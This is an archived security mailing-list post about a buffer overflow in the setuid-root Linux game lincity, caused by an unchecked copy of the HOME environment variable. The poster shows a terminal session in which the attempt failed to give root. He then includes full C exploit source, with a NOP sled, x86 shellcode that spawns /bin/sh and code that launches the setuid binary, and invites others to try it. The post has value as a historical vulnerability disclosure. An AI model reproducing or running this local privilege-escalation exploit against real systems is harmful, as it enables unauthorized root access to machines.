Greetings, While a buffer overflow is blantenly obvious in the code, I don't think it is very dangerous. Observe. jaded:~> id uid=1000(tfreak) gid=1000(tfreak) groups=1000(tfreak),0(root),4(adm),7(lp),24(cdrom),25(floppy),31(majordom),69(geek) jaded:~> ls -l /usr/games/lincity -rwsr-xr-x 1 root root 769384 Mar 14 20:36 /usr/games/lincity jaded:~> ./x svgalib: Using S3 driver (Trio64, 2048K). svgalib: s3: chipsets newer than S3-864 is not supported well yet. svgalib: RAMDAC: Trio64: MCLK = 50.114 MHz sh-2.01$ id uid=1000(tfreak) gid=1000(tfreak) groups=1000(tfreak),0(root),4(adm),7(lp),24(cdrom),25(floppy),31(majordom),69(geek) sh-2.01$ despite the setuid permissions, I was unable to obtain a root shell. I have included the exploit for you to test yourself, perhaps it will work on older versions of svgalib. Let me know how it turns out. I remain, tf. /* * lincity-svga exploit by TFreak * * another example of bad programming, copying the HOME environment * without bounds checking to a static size buffer (100 bytes) * */ #include <stdio.h> #define bs 250 #define of 300 unsigned long sp (void); int main(int argc, char *argv[]) { char *p, *buf; char shell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; unsigned long addr, *paddr; int i; buf = (char *) malloc(bs); p = buf; paddr = (unsigned long *) p; addr = sp() - of; for (i = 0; i < bs; i += 4) *(paddr++) = addr; memset(p, 0x90, bs/2); p += bs/2; for (i = 0; i < strlen(shell); i++) *(p++) = shell[i]; setenv("HOME", buf, 1); execl("/usr/games/lincity", "lincity", NULL); } unsigned long sp (void) { __asm__("movl %esp, %eax"); }
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:45:39 PDT